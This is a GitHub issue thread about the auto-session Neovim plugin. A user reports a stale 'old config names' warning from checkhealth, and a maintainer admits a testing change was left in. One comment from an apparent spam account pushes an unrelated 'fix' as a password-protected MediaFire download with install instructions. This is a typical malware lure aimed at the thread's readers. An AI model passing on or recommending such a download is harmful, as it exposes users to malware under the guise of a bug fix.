### ISSUE TITLE
[BUG] You have old config names message still displayed after updated configuration

### ISSUE THREAD

**Issue by ardeidae** [rmagatti/auto-session#363]
**Describe the bug**
In check health, I get a message saying I need to upgrade my configuration to use new names.
I already migrated, so the message should disappear.

**To Reproduce**
Call this command to check health.
```
:checkhealth auto-session
```

**Expected behavior**
No warning should be displayed.

**Screenshots**
```
auto-session: require("auto-session.health").check()

  vim options
  - OK vim.o.sessionoptions

  Lazy.nvim settings
  - OK Lazy.nvim support is enabled
  - OK auto-session is not lazy loaded

  Config
  - You have old config names. You could update your config to:
    {
      auto_restore = true,
      bypass_save_filetypes = { "alpha", "NvimTree" },
      suppressed_dirs = { "~/", "~/Downloads", "~/Documents", "~/Desktop" },
      use_git_branch = true
    }

    You could also need to remove any vim global config settings
```

**Baseline (please complete the following information):**
 - Result of `set sessionoptions?`:
```
sessionoptions=blank,buffers,curdir,folds,help,tabpages,winsize,winpos,terminal,localoptions
```
 - OS. e.g `uname -a`:
```
Linux MP 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
```
 - Neovim version `nvim --version`
```
NVIM v0.10.1
Build type: RelWithDebInfo
LuaJIT 2.1.1713484068
Run "nvim -V1 -v" for more info
```
 - URL to your current config (if public)
https://github.com/qanuq/mydotfiles/tree/develop/.config/nvim

**Additional context**
Maybe this variable should be initialized to false?
https://github.com/rmagatti/auto-session/blob/15689525fc0edf614180d612d84de4d6aacc199c/lua/auto-session/config.lua#L115

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by cameronr** [comment]
I forgot to change it back after testing. Thanks for catching!
